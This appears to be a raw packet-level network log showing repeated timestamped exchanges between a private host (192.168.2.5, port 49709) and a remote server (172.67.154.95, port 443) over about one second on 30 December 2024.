Dec 30, 2024 19:15:12.133018017 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.133054018 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.133080959 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.133095026 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.133116961 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.133145094 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.142982960 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.143160105 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.148416996 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.148433924 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.148494005 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.148510933 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.169976950 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.169995070 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.170027018 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.170044899 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.170058966 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.170996904 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.171020031 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.171042919 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.171051979 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.171082020 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.192331076 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.192363977 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.192389965 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.192406893 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.192420006 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.193650007 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.193662882 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.193694115 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.193701029 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.193722010 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.212208986 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.212227106 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.212274075 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.212296009 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.212352991 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.218579054 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.218590975 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.218655109 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.218663931 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.231719017 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.231735945 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.231791019 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.231805086 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.236951113 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.236975908 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.237046003 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.237046003 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.237056017 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.258723974 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.258744955 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.258790970 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.258804083 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.258836985 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.259552956 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.259567022 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.259618044 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.259624958 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.284893990 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.284917116 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.284965038 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.284980059 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.285001040 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.286109924 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.286123991 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.286160946 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.286169052 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.286195993 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.304958105 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.304989100 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.305023909 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.305042028 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.305063963 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.311485052 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.311501026 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.311557055 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.311567068 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.324172020 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.324192047 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.324254990 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.324266911 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.325684071 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.325741053 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.325748920 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.325792074 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.349594116 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.349610090 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.349668980 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.349684000 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.349911928 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.350095034 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.350111008 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.350142956 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.350147963 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.350168943 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.350184917 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.351154089 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.351172924 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.351219893 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.351224899 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.351249933 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.351268053 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.372899055 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.372927904 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.372978926 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.372999907 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.373044014 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.374042988 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.374064922 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.374123096 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.374126911 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.374212027 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.396224022 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.396245956 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.396296024 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.396308899 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.396333933 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.396351099 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.397918940 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.397933960 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.397975922 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.397981882 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.398101091 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.409760952 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.409785032 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.409852982 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.409852982 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.409861088 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.409895897 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.434875011 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.434890985 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.434933901 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.434942007 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.434978962 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.435643911 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.435658932 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.435708046 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.435715914 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.435758114 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.436485052 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.436503887 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.436544895 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.436551094 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.436606884 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.457710028 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.457732916 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.457767963 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.457773924 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.457808018 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.458822966 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.458837032 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.458878040 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.458882093 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.458991051 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.477637053 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.477693081 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.477699995 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.477711916 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.477746010 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.483656883 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.483670950 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.483764887 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.483772993 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.483880997 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.496799946 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.496845961 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.496870995 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.496876955 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.497062922 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.502106905 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.502120972 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.502204895 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.502208948 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.502392054 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.524561882 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.524574041 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.524651051 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.524655104 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.524795055 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.525444984 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.525458097 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.525557995 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.525562048 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.525620937 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.546041012 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.546066046 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.546190977 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.546200037 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.546273947 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.547034025 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.547049999 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.547116041 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.547121048 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.547182083 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.571082115 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.571099997 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.571197033 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.571203947 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.571280956 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.576817989 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.576834917 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.576930046 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.576934099 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.577040911 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.591777086 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.591794014 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.591840029 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.591845036 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.591923952 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.595247030 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.595259905 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.595325947 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.595330954 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.595380068 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.613183022 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.613198042 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.613277912 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.613282919 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.613365889 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.614048958 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.614064932 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.614139080 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.614144087 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.614248037 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.635812044 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.635837078 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.635946989 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.635951996 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.636110067 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.637233973 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.637249947 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.637356997 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.637362003 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.637460947 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.662358046 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.662374020 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.662425041 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.662430048 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.662481070 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.665359974 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.665374994 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.665426016 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.665430069 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.665462017 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.680401087 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.680414915 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.680480957 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.680486917 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.680624008 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.683783054 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.683796883 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.683888912 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.683892965 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.684016943 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.701867104 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.701881886 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.701946974 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.701951981 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.702079058 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.702378988 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.702393055 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.702456951 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.702461004 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.702533960 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.735799074 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.735815048 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.735930920 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.735940933 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.736135960 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.736975908 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.737016916 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.737099886 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.737104893 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.737240076 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.787720919 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.787739992 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.787921906 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.787930965 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.788022995 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.788352966 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.788367987 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.788438082 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.788443089 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.788522959 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.828697920 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.828726053 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.828825951 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.828831911 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.828929901 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.837083101 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.837101936 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.837141037 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.837146044 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.837173939 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.856971025 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.856992006 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.857019901 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.857026100 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.857063055 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.857865095 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.857882023 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.857932091 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.857937098 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.857964993 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.883196115 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.883210897 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.883260012 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.883266926 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.883292913 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.883821964 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.883837938 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.883883953 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.883888006 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.884011030 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.934951067 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.934976101 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.935041904 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.935070992 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.935089111 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.935122967 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.935403109 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.935420990 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.935470104 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.935475111 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.935508013 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.978166103 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.978185892 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.978243113 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.978252888 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.978285074 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.978306055 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.990688086 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.990709066 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.990748882 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.990756035 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.990802050 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.012243986 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.012264013 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.012305975 CET	49709	443	192.168.2.5	172.67.154.95
